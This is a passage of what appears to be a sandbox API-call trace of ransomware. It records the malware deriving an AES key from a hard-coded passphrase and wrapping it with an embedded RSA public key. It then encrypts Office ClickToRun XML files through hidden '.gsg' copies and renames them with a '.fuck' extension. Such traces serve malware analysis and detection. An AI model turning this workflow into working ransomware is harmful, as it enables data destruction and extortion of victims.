Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.480] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.480] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.481] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.481] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.481] CryptDestroyKey (hKey=0x28467e0) returned 1 [0239.481] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.481] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.481] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.481] GetLastError () returned 0x5 [0239.481] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml")) returned 0x20 [0239.482] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.482] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.482] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.483] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.483] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ac828) returned 1 [0239.485] CryptCreateHash (in: hProv=0x28ac828, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.485] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.485] CryptHashData (hHash=0x2893fb0, pbData=0x28571c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.485] CryptDeriveKey (in: hProv=0x28ac828, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28467e0) returned 1 [0239.485] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.485] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.485] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ad460) returned 1 [0239.485] CryptImportPublicKeyInfo (in: hCryptProv=0x28ad460, dwCertEncodingType=0x1, pInfo=0x2897440*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897470*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897478*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28beb18) returned 1 [0239.486] CryptEncrypt (in: hKey=0x28beb18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.486] CryptEncrypt (in: hKey=0x28beb18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ac8b0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ac8b0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.486] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ac8b0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.486] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.486] CryptEncrypt (in: hKey=0x28467e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.486] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.486] CloseHandle (hObject=0xffffffff) returned 1 [0239.486] CloseHandle (hObject=0xffffffff) returned 1 [0239.486] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.486] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.487] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml.gsg")) returned 0 [0239.487] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml.fuck")) returned 0 [0239.488] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.488] CryptDestroyKey (hKey=0x28467e0) returned 1 [0239.488] CryptReleaseContext (hProv=0x28ac828, dwFlags=0x0) returned 1 [0239.488] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.488] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.488] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.490] GetLastError () returned 0x5 [0239.490] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml")) returned 0x20 [0239.490] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml", dwFileAttributes=0x80) returned 0 [0239.491] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.491] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.491] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.492] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.493] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.493] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.493] CryptHashData (hHash=0x28beb98, pbData=0x28573f8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.493] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28beb98, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28bf098) returned 1 [0239.494] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.494] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.494] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28acd78) returned 1 [0239.494] CryptImportPublicKeyInfo (in: hCryptProv=0x28acd78, dwCertEncodingType=0x1, pInfo=0x2897920*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897950*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897958*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28bead8) returned 1 [0239.495] CryptEncrypt (in: hKey=0x28bead8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.495] CryptEncrypt (in: hKey=0x28bead8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28acb58*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28acb58*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.495] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28acb58, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.495] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.496] CryptEncrypt (in: hKey=0x28bf098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.496] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.496] CloseHandle (hObject=0xffffffff) returned 1 [0239.496] CloseHandle (hObject=0xffffffff) returned 1 [0239.496] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml"), bFailIfExists=0) returned 0 [0239.496] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml", dwFileAttributes=0x0) returned 0 [0239.497] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml.gsg")) returned 0 [0239.497] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerLogon.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerlogon.xml.fuck")) returned 0 [0239.498] CryptDestroyHash (hHash=0x28beb98) returned 1 [0239.498] CryptDestroyKey (hKey=0x28bf098) returned 1 [0239.498] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.498] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.498] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.498] GetLastError () returned 0x5 [0239.498] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml")) returned 0x20 [0239.498] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml", dwFileAttributes=0x80) returned 0 [0239.499] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.499] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.499] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.500] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.502] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.502] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.502] CryptHashData (hHash=0x28befd8, pbData=0x28571f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.502] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28befd8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28beb58) returned 1 [0239.502] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.502] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.502] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ad0a8) returned 1 [0239.503] CryptImportPublicKeyInfo (in: hCryptProv=0x28ad0a8, dwCertEncodingType=0x1, pInfo=0x2897b90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897bc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897bc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28bed58) returned 1 [0239.503] CryptEncrypt (in: hKey=0x28bed58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.503] CryptEncrypt (in: hKey=0x28bed58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ac828*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ac828*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.503] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ac828, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.503] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.503] CryptEncrypt (in: hKey=0x28beb58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.503] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.503] CloseHandle (hObject=0xffffffff) returned 1 [0239.504] CloseHandle (hObject=0xffffffff) returned 1 [0239.504] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml"), bFailIfExists=0) returned 0 [0239.504] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml", dwFileAttributes=0x0) returned 0 [0239.504] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml.gsg")) returned 0 [0239.505] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officebackgroundtaskhandlerregistration.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeBackgroundTaskHandlerRegistration.xml.fuck" (normalized: "c:\\users\\all 